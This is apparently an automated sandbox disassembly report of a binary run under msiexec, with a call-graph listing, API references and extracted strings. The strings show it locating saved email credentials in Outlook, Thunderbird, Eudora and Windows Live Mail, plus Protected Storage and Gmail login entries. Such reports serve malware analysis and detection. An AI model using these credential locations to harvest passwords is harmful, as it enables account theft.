33717->33876 33877 410b62 RegEnumKeyExA 33717->33877 33875 410add RegQueryValueExA 33718->33875 33723 40823f 
33722->33723 33724 403cc6 33723->33724 33725 408246 memset 33723->33725 33730 4086e0 33724->33730 33878 410b62 RegEnumKeyExA 33725->33878 33727 40826f 33727->33724 33879 4080ed 11 API calls 33727->33879 33880 410b62 RegEnumKeyExA 33727->33880 33881 4045db 33730->33881 33732 4088ef 33889 404656 33732->33889 33736 408737 wcslen 33736->33732 33742 40876a 33736->33742 33737 40877a wcsncmp 33737->33742 33739 404734 3 API calls 33739->33742 33740 404785 FreeLibrary 33740->33742 33741 408812 memset 33741->33742 33743 40883c memcpy wcschr 33741->33743 33742->33732 33742->33737 33742->33739 33742->33740 33742->33741 33742->33743 33744 4088c3 LocalFree 33742->33744 33892 40466b _mbscpy 33742->33892 33743->33742 33744->33742 33746 402c7a 33745->33746 33747 402d9a 33746->33747 33748 402c87 memset 33746->33748 33747->33648 33893 410b62 RegEnumKeyExA 33748->33893 33750 410b1e RegQueryValueExA 33751 402ce4 memset sprintf 33750->33751 33754 402cb2 33751->33754 33752 402d3a sprintf 33752->33754 33754->33747 33754->33750 33754->33752 33894 402bd1 37 API calls 33754->33894 33895 402bd1 37 API calls 33754->33895 33896 410b62 RegEnumKeyExA 33754->33896 33758 410816 33757->33758 33759 4107f1 FreeLibrary 33758->33759 33760 403ddd 33759->33760 33760->33658 33762 402ff9 33761->33762 33763 403006 memset 33762->33763 33764 403122 33762->33764 33897 410b62 RegEnumKeyExA 33763->33897 33764->33662 33766 410b1e RegQueryValueExA 33767 403058 memset sprintf 33766->33767 33771 403033 33767->33771 33768 4030a2 memset 33898 410b62 RegEnumKeyExA 33768->33898 33771->33764 33771->33766 33771->33768 33772 410b62 RegEnumKeyExA 33771->33772 33899 402db3 24 API calls 33771->33899 33772->33771 33774 4032d5 33773->33774 33775 4033a9 33773->33775 33900 4021b6 memset 33774->33900 33788 4034e4 memset memset 33775->33788 33777 4032e1 33901 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33777->33901 33779 4032ea 33780 4032f8 memset GetPrivateProfileSectionA 33779->33780 33902 4023e5 16 API calls 
33779->33902 33780->33775 33785 40332f 33780->33785 33782 40339b strlen 33782->33775 33782->33785 33784 403350 strchr 33784->33785 33785->33775 33785->33782 33903 4021b6 memset 33785->33903 33904 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33785->33904 33905 4023e5 16 API calls 33785->33905 33789 410b1e RegQueryValueExA 33788->33789 33790 40353f 33789->33790 33791 40357f 33790->33791 33792 403546 _mbscpy 33790->33792 33796 403985 33791->33796 33906 406d55 strlen _mbscat 33792->33906 33794 403565 _mbscat 33907 4033f0 19 API calls 33794->33907 33908 40466b _mbscpy 33796->33908 33800 4039aa 33802 4039ff 33800->33802 33909 40f6e2 33800->33909 33925 40f460 12 API calls 33800->33925 33926 4038e8 21 API calls 33800->33926 33803 404785 FreeLibrary 33802->33803 33804 403a0b 33803->33804 33805 4037ca memset memset 33804->33805 33928 444551 memset 33805->33928 33808 4038e2 33808->33672 33867 40f334 333 API calls 33808->33867 33810 40382e 33811 406f06 2 API calls 33810->33811 33812 403843 33811->33812 33813 406f06 2 API calls 33812->33813 33814 403855 strchr 33813->33814 33815 403884 _mbscpy 33814->33815 33816 403897 strlen 33814->33816 33817 4038bf _mbscpy 33815->33817 33816->33817 33818 4038a4 sprintf 33816->33818 33937 4023e5 16 API calls 33817->33937 33818->33817 33822 40fb10 33820->33822 33821 403e7f 33830 40f96c 33821->33830 33822->33821 33823 40fb55 RegQueryValueExA 33822->33823 33823->33821 33824 40fb84 33823->33824 33825 404734 3 API calls 33824->33825 33826 40fb91 33825->33826 33826->33821 33827 40fc19 LocalFree 33826->33827 33828 40fbdd memcpy memcpy 33826->33828 33827->33821 33941 40f802 7 API calls 33828->33941 33831 4070ae GetVersionExA 33830->33831 33832 40f98d 33831->33832 33833 4045db 7 API calls 33832->33833 33837 40f9a9 33833->33837 33834 40fae6 33835 404656 FreeLibrary 33834->33835 33836 403e85 33835->33836 33842 4442ea memset 33836->33842 33837->33834 33838 40fa13 memset WideCharToMultiByte 33837->33838 33838->33837 33839 40fa43 _strnicmp 
33838->33839 33839->33837 33840 40fa5b WideCharToMultiByte 33839->33840 33840->33837 33841 40fa88 WideCharToMultiByte 33840->33841 33841->33837 33843 410dbb 7 API calls 33842->33843 33844 444329 33843->33844 33942 40759e strlen strlen 33844->33942 33849 410dbb 7 API calls 33850 444350 33849->33850 33851 40759e 3 API calls 33850->33851 33852 44435a 33851->33852 33853 444212 64 API calls 33852->33853 33854 444366 memset memset 33853->33854 33855 410b1e RegQueryValueExA 33854->33855 33856 4443b9 ExpandEnvironmentStringsA strlen 33855->33856 33857 4443f4 _strcmpi 33856->33857 33858 4443e5 33856->33858 33859 403e91 33857->33859 33860 44440c 33857->33860 33858->33857 33859->33490 33861 444212 64 API calls 33860->33861 33861->33859 33862->33643 33863->33644 33864->33651 33865->33653 33866->33654 33867->33672 33868->33674 33869->33702 33870->33706 33871->33699 33873 40841c 33872->33873 33873->33713 33874->33717 33875->33717 33876->33717 33877->33717 33878->33727 33879->33727 33880->33727 33882 404656 FreeLibrary 33881->33882 33883 4045e3 LoadLibraryA 33882->33883 33884 404651 33883->33884 33885 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33883->33885 33884->33732 33884->33736 33886 40463d 33885->33886 33887 404643 33886->33887 33888 404656 FreeLibrary 33886->33888 33887->33884 33888->33884 33890 404666 33889->33890 33891 40465c FreeLibrary 33889->33891 33890->33641 33891->33890 33892->33742 33893->33754 33894->33752 33895->33754 33896->33754 33897->33771 33898->33771 33899->33771 33900->33777 33901->33779 33902->33780 33903->33784 33904->33785 33905->33785 33906->33794 33907->33791 33908->33800 33927 40466b _mbscpy 33909->33927 33911 40f6fa 33912 4045db 7 API calls 33911->33912 33913 40f708 33912->33913 33915 404734 3 API calls 33913->33915 33919 40f7e2 33913->33919 33914 404656 FreeLibrary 33916 40f7f1 33914->33916 33920 40f715 33915->33920 33917 404785 FreeLibrary 33916->33917 33918 40f7fc 33917->33918 33918->33800 33919->33914 
33920->33919 33921 40f797 WideCharToMultiByte 33920->33921 33922 40f7b8 strlen 33921->33922 33923 40f7d9 LocalFree 33921->33923 33922->33923 33924 40f7c8 _mbscpy 33922->33924 33923->33919 33924->33923 33925->33800 33926->33800 33927->33911 33929 44458b 33928->33929 33930 40381a 33929->33930 33938 410add RegQueryValueExA 33929->33938 33930->33808 33936 4021b6 memset 33930->33936 33932 4445a4 33932->33930 33939 410add RegQueryValueExA 33932->33939 33934 4445c1 33934->33930 33940 444879 30 API calls 33934->33940 33936->33810 33937->33808 33938->33932 33939->33934 33940->33930 33941->33827 33943 4075c9 33942->33943 33944 4075bb _mbscat 33942->33944 33945 444212 33943->33945 33944->33943 33962 407e9d 33945->33962 33948 44424d 33949 444274 33948->33949 33950 444258 33948->33950 33970 407ef8 33948->33970 33951 407e9d 9 API calls 33949->33951 33987 444196 51 API calls 33950->33987 33958 4442a0 33951->33958 33953 407ef8 9 API calls 33953->33958 33954 4442ce 33984 407f90 33954->33984 33958->33953 33958->33954 33960 444212 64 API calls 33958->33960 33980 407e62 33958->33980 33959 407f90 FindClose 33961 4442e4 33959->33961 33960->33958 33961->33849 33963 407f90 FindClose 33962->33963 33964 407eaa 33963->33964 33965 406f06 2 API calls 33964->33965 33966 407ebd strlen strlen 33965->33966 33967 407ee1 33966->33967 33968 407eea 33966->33968 33988 4070e3 strlen _mbscat _mbscpy _mbscat 33967->33988 33968->33948 33971 407f03 FindFirstFileA 33970->33971 33972 407f24 FindNextFileA 33970->33972 33973 407f3f 33971->33973 33974 407f46 strlen strlen 33972->33974 33975 407f3a 33972->33975 33973->33974 33979 407f7f 33973->33979 33977 407f76 33974->33977 33974->33979 33976 407f90 FindClose 33975->33976 33976->33973 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33989 33979->33948 33981 407e94 33980->33981 33982 407e6c strcmp 33980->33982 33981->33958 33982->33981 33983 407e83 strcmp 33982->33983 33983->33981 33985 407fa3 33984->33985 33986 407f99 FindClose 33984->33986 33985->33959 
33986->33985 33987->33948 33988->33968 33989->33979 33990->33503 33991->33507 33992->33513 33993->33514 33994->33520 33995->33517 33996->33512 34014 411853 RtlInitializeCriticalSection memset 34015 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34190 40a256 13 API calls 34192 432e5b 17 API calls 34194 43fa5a 20 API calls 34017 401060 41 API calls 34197 427260 CloseHandle memset memset 34021 410c68 FindResourceA SizeofResource LoadResource LockResource 34199 405e69 14 API calls 34023 433068 15 API calls __fprintf_l 34201 414a6d 18 API calls 34202 43fe6f 134 API calls 34025 424c6d 15 API calls __fprintf_l 34203 426741 19 API calls 34027 440c70 17 API calls 34028 443c71 42 API calls 34031 427c79 24 API calls 34206 416e7e memset __fprintf_l 34035 42800b 47 API calls 34036 425115 85 API calls __fprintf_l 34209 41960c 61 API calls 34037 43f40c 122 API calls __fprintf_l 34040 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34041 43f81a 20 API calls 34043 414c20 memset memset 34044 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34213 414625 18 API calls 34214 404225 modf 34215 403a26 strlen WriteFile 34217 40422a 12 API calls 34221 427632 memset memset memcpy 34222 40ca30 59 API calls 34223 404235 26 API calls 34045 42ec34 61 API calls __fprintf_l 34046 425115 76 API calls __fprintf_l 34224 425115 77 API calls __fprintf_l 34226 44223a 38 API calls 34052 43183c 112 API calls 34227 44b2c5 _onexit __dllonexit 34232 42a6d2 memcpy __allrem 34054 405cda 60 API calls 34240 43fedc 138 API calls 34241 4116e1 16 API calls __fprintf_l 34057 4244e6 19 API calls 34059 42e8e8 127 API calls __fprintf_l 34060 4118ee RtlLeaveCriticalSection 34246 43f6ec 22 API calls 34062 425115 119 API calls __fprintf_l 34063 410cf3 EnumResourceNamesA 34249 4492f0 memcpy memcpy 34251 43fafa 18 API calls 34253 4342f9 15 API calls __fprintf_l 34064 4144fd 19 API calls 34255 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 
34256 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34259 443a84 _mbscpy 34261 43f681 17 API calls 34067 404487 22 API calls 34263 415e8c 16 API calls __fprintf_l 34071 411893 RtlDeleteCriticalSection __fprintf_l 34072 41a492 42 API calls 34267 403e96 34 API calls 34268 410e98 memset SHGetPathFromIDList SendMessageA 34074 426741 109 API calls __fprintf_l 34075 4344a2 18 API calls 34076 4094a2 10 API calls 34271 4116a6 15 API calls __fprintf_l 34272 43f6a4 17 API calls 34273 440aa3 20 API calls 34275 427430 45 API calls 34079 4090b0 7 API calls 34080 4148b0 15 API calls 34082 4118b4 RtlEnterCriticalSection 34083 4014b7 CreateWindowExA 34084 40c8b8 19 API calls 34086 4118bf RtlTryEnterCriticalSection 34280 42434a 18 API calls __fprintf_l 34282 405f53 12 API calls 34094 43f956 59 API calls 34096 40955a 17 API calls 34097 428561 36 API calls 34098 409164 7 API calls 34286 404366 19 API calls 34290 40176c ExitProcess 34293 410777 42 API calls 34103 40dd7b 51 API calls 34104 425d7c 16 API calls __fprintf_l 34295 43f6f0 25 API calls 34296 42db01 22 API calls 34105 412905 15 API calls __fprintf_l 34297 403b04 54 API calls 34298 405f04 SetDlgItemTextA GetDlgItemTextA 34299 44b301 ??3@YAXPAX 34302 4120ea 14 API calls 3 library calls 34303 40bb0a 8 API calls 34305 413f11 strcmp 34109 434110 17 API calls __fprintf_l 34112 425115 108 API calls __fprintf_l 34306 444b11 _onexit 34114 425115 76 API calls __fprintf_l 34117 429d19 10 API calls 34309 444b1f __dllonexit 34310 409f20 _strcmpi 34119 42b927 31 API calls 34313 433f26 19 API calls __fprintf_l 34314 44b323 FreeLibrary 34315 427f25 46 API calls 34316 43ff2b 17 API calls 34317 43fb30 19 API calls 34126 414d36 16 API calls 34128 40ad38 7 API calls 34319 433b38 16 API calls __fprintf_l 33997 44b33b 33998 44b344 ??3@YAXPAX 33997->33998 33999 44b34b 33997->33999 33998->33999 34000 44b354 ??3@YAXPAX 33999->34000 34001 44b35b 33999->34001 34000->34001 34002 44b364 ??3@YAXPAX 34001->34002 34003 44b36b 
34001->34003 34002->34003 34004 44b374 ??3@YAXPAX 34003->34004 34005 44b37b 34003->34005 34004->34005 34132 426741 21 API calls 34133 40c5c3 123 API calls 34135 43fdc5 17 API calls 34320 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34138 4161cb memcpy memcpy memcpy memcpy 34325 43ffc8 18 API calls 34139 4281cc 15 API calls __fprintf_l 34327 4383cc 110 API calls __fprintf_l 34140 4275d3 41 API calls 34328 4153d3 22 API calls __fprintf_l 34141 444dd7 _XcptFilter 34333 4013de 15 API calls 34335 425115 111 API calls __fprintf_l 34336 43f7db 18 API calls 34339 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34143 4335ee 16 API calls __fprintf_l 34341 429fef 11 API calls 34144 444deb _exit _c_exit 34342 40bbf0 133 API calls 34147 425115 79 API calls __fprintf_l 34346 437ffa 22 API calls 34151 4021ff 14 API calls 34152 43f5fc 149 API calls 34347 40e381 9 API calls 34154 405983 40 API calls 34155 42b186 27 API calls __fprintf_l 34156 427d86 76 API calls 34157 403585 20 API calls 34159 42e58e 18 API calls __fprintf_l 34162 425115 75 API calls __fprintf_l 34164 401592 8 API calls 33200 410b92 33203 410a6b 33200->33203 33202 410bb2 33204 410a77 33203->33204 33205 410a89 GetPrivateProfileIntA 33203->33205 33208 410983 memset _itoa WritePrivateProfileStringA 33204->33208 33205->33202 33207 410a84 33207->33202 33208->33207 34351 434395 16 API calls 34166 441d9c memcmp 34353 43f79b 119 API calls 34167 40c599 42 API calls 34354 426741 87 API calls 34171 4401a6 21 API calls 34173 426da6 memcpy memset memset memcpy 34174 4335a5 15 API calls 34176 4299ab memset memset memcpy memset memset 34177 40b1ab 8 API calls 34359 425115 76 API calls __fprintf_l 34363 4113b2 18 API calls 2 library calls 34367 40a3b8 memset sprintf SendMessageA 33209 410bbc 33212 4109cf 33209->33212 33213 4109dc 33212->33213 33214 410a23 memset GetPrivateProfileStringA 33213->33214 33215 4109ea memset 33213->33215 33220 407646 strlen 33214->33220 33225 4075cd sprintf memcpy 
33215->33225 33218 410a65 33219 410a0c WritePrivateProfileStringA 33219->33218 33221 40765a 33220->33221 33223 40765c 33220->33223 33221->33218 33222 4076a3 33222->33218 33223->33222 33226 40737c strtoul 33223->33226 33225->33219 33226->33223 34179 40b5bf memset memset _mbsicmp

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph; first node 129 at 4082cd-40841a; legend: Executed / Not Executed]
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040832F
                                                                                                      • memset.MSVCRT ref: 00408343
                                                                                                      • memset.MSVCRT ref: 0040835F
                                                                                                      • memset.MSVCRT ref: 00408376
                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                      • strlen.MSVCRT ref: 004083E9
                                                                                                      • strlen.MSVCRT ref: 004083F8
                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharMulusermeWidestrlen$ComputerUsermemcpy
                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                      • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                      • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                                      Control-flow Graph

                                                                                                      [Control-flow graph; first node 335 at 407ef8-407f01; legend: Executed / Not Executed]
                                                                                                      APIs
                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                      • strlen.MSVCRT ref: 00407F5C
                                                                                                      • strlen.MSVCRT ref: 00407F64
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                      • String ID: ACD
                                                                                                      • API String ID: 379999529-620537770

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00401E8B
                                                                                                      • strlen.MSVCRT ref: 00401EA4
                                                                                                      • strlen.MSVCRT ref: 00401EB2
                                                                                                      • strlen.MSVCRT ref: 00401EF8
                                                                                                      • strlen.MSVCRT ref: 00401F06
                                                                                                      • memset.MSVCRT ref: 00401FB1
                                                                                                      • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                      • memset.MSVCRT ref: 00402003
                                                                                                      • sprintf.MSVCRT ref: 00402030
                                                                                                      • memset.MSVCRT ref: 00402086
                                                                                                      • memset.MSVCRT ref: 0040209B
                                                                                                      • strlen.MSVCRT ref: 004020A1
                                                                                                      • strlen.MSVCRT ref: 004020AF
                                                                                                      • strlen.MSVCRT ref: 004020E2
                                                                                                      • strlen.MSVCRT ref: 004020F0
                                                                                                      • memset.MSVCRT ref: 00402018
                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$`{/h$current$nss3.dll$sqlite3.dll
                                                                                                      • API String ID: 3833278029-3653834404

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$`7<u
                                                                                                      • API String ID: 745651260-3672999695

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                      Strings
                                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                      • API String ID: 1197458902-317895162

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                      • String ID: kv
                                                                                                      • API String ID: 3662548030-155876773

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                      Strings
                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                      • API String ID: 3203569119-2578778931

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2054149589-0

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                      • String ID: /nosort$/sort
                                                                                                      • API String ID: 882979914-1578091866

                                                                                                      Control-flow Graph

